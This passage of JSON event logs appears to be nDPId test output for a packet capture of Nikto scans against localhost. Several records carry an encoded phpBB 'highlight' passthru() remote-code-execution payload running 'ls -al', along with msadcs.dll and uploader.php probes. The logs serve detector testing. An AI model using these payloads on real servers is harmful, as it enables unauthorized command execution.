+01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277834,"flow_last_seen":1576420277834,"flow_idle_time":7560000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50976,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":708,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277836,"flow_last_seen":1576420277836,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277836,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50978,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00860{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":708,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_packet_id":1,"flow_last_seen":1576420277836,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":349,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":349,"pkt_l4_len":315,"thread_ts_msec":1576420277836,"pkt":"AAAAAAAAAAAAAAAACABFAAFPP1dAAEAG\/E9\/AAABfwAAAcciH5AaoQZne4dTBYAYAED\/QwAAAQEICp1m\/3OdZv9zR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01200{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":708,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277836,"flow_last_seen":1576420277836,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277836,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50978,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":709,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277838,"flow_last_seen":1576420277838,"flow_idle_time":7560000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":1576420277838,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50980,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":709,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_packet_id":1,"flow_last_seen":1576420277838,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":358,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":358,"pkt_l4_len":324,"thread_ts_msec":1576420277838,"pkt":"AAAAAAAAAAAAAAAACABFAAFY3j1AAEAGXWB\/AAABfwAAAcckH5DNwecJcN6f0YAYAED\/TAAAAQEICp1m\/3adZv92R0VUIC9wb3N0bnVrZS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01210{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":709,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277838,"flow_last_seen":1576420277838,"flow_idle_time":7560000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":1576420277838,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50980,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277840,"flow_last_seen":1576420277840,"flow_idle_time":7560000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50982,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_packet_id":1,"flow_last_seen":1576420277840,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1576420277840,"pkt":"AAAAAAAAAAAAAAAACABFAAFdmNpAAEAGor5\/AAABfwAAAccmH5CDpKHt6Uk16IAYAED\/UQAAAQEICp1m\/3idZv93R0VUIC9wb3N0bnVrZS9odG1sL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":710,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277840,"flow_last_seen":1576420277840,"flow_idle_time":7560000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50982,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":711,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277841,"flow_last_seen":1576420277841,"flow_idle_time":7560000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":1,"thread_ts_msec":1576420277841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00868{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":711,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_packet_id":1,"flow_last_seen":1576420277841,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":357,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":357,"pkt_l4_len":323,"thread_ts_msec":1576420277841,"pkt":"AAAAAAAAAAAAAAAACABFAAFXf1lAAEAGvEV\/AAABfwAAAccoH5A3NUZkeJaOS4AYAED\/SwAAAQEICp1m\/3mdZv95R0VUIC9tb2R1bGVzL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTkpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":711,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277841,"flow_last_seen":1576420277841,"flow_idle_time":7560000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":1,"thread_ts_msec":1576420277841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":712,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277843,"flow_last_seen":1576420277843,"flow_idle_time":7560000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277843,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50986,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00867{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":712,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_packet_id":1,"flow_last_seen":1576420277843,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":355,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":355,"pkt_l4_len":321,"thread_ts_msec":1576420277843,"pkt":"AAAAAAAAAAAAAAAACABFAAFV4EBAAEAGW2B\/AAABfwAAAccqH5AAS9kLhsuzOIAYAED\/SQAAAQEICp1m\/3udZv96R0VUIC9waHBCQi92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTkpDQoNCg=="} +01207{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":712,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277843,"flow_last_seen":1576420277843,"flow_idle_time":7560000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277843,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50986,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":713,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277844,"flow_last_seen":1576420277844,"flow_idle_time":7560000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50988,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00868{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":713,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_packet_id":1,"flow_last_seen":1576420277844,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":355,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":355,"pkt_l4_len":321,"thread_ts_msec":1576420277844,"pkt":"AAAAAAAAAAAAAAAACABFAAFVVuFAAEAG5L9\/AAABfwAAAccsH5DRJG\/rOSfatoAYAED\/SQAAAQEICp1m\/3ydZv98R0VUIC9mb3J1bS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01207{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":713,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277844,"flow_last_seen":1576420277844,"flow_idle_time":7560000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50988,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":714,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277845,"flow_last_seen":1576420277845,"flow_idle_time":7560000,"flow_min_l4_payload_len":308,"flow_max_l4_payload_len":308,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1576420277845,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50990,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":714,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_packet_id":1,"flow_last_seen":1576420277845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":374,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":374,"pkt_l4_len":340,"thread_ts_msec":1576420277845,"pkt":"AAAAAAAAAAAAAAAACABFAAFouhJAAEAGgXt\/AAABfwAAAccuH5A6xYMmaghNdoAYAED\/XAAAAQEICp1m\/32dZv99R0VUIC9pbmRleC5waHA\/bmFtZT1QTnBocEJCMiZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxNDAwKQ0KDQo="} +01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":714,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277845,"flow_last_seen":1576420277845,"flow_idle_time":7560000,"flow_min_l4_payload_len":308,"flow_max_l4_payload_len":308,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1576420277845,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50990,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001400)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":715,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277847,"flow_last_seen":1576420277847,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50992,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":715,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_packet_id":1,"flow_last_seen":1576420277847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277847,"pkt":"AAAAAAAAAAAAAAAACABFAADFXW9AAEAG3sF\/AAABfwAAAccwH5A6PWRZjzFeOIAYAED+uQAAAQEICp1m\/3+dZv9\/R0VUIC9tc2FkYy9tc2FkY3MuZGxsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDE0NzQpDQoNCg=="} 
+01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":715,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277847,"flow_last_seen":1576420277847,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50992,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/msadcs.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001474)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":716,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277849,"flow_last_seen":1576420277849,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277849,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50994,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":716,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_packet_id":1,"flow_last_seen":1576420277849,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277849,"pkt":"AAAAAAAAAAAAAAAACABFAADBYllAAEAG2dt\/AAABfwAAAccyH5AM9ltiiZJuH4AYAED+tQAAAQEICp1m\/4GdZv+AR0VUIC91cGxvYWRlci5waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAxOCkNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":716,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277849,"flow_last_seen":1576420277849,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277849,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50994,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 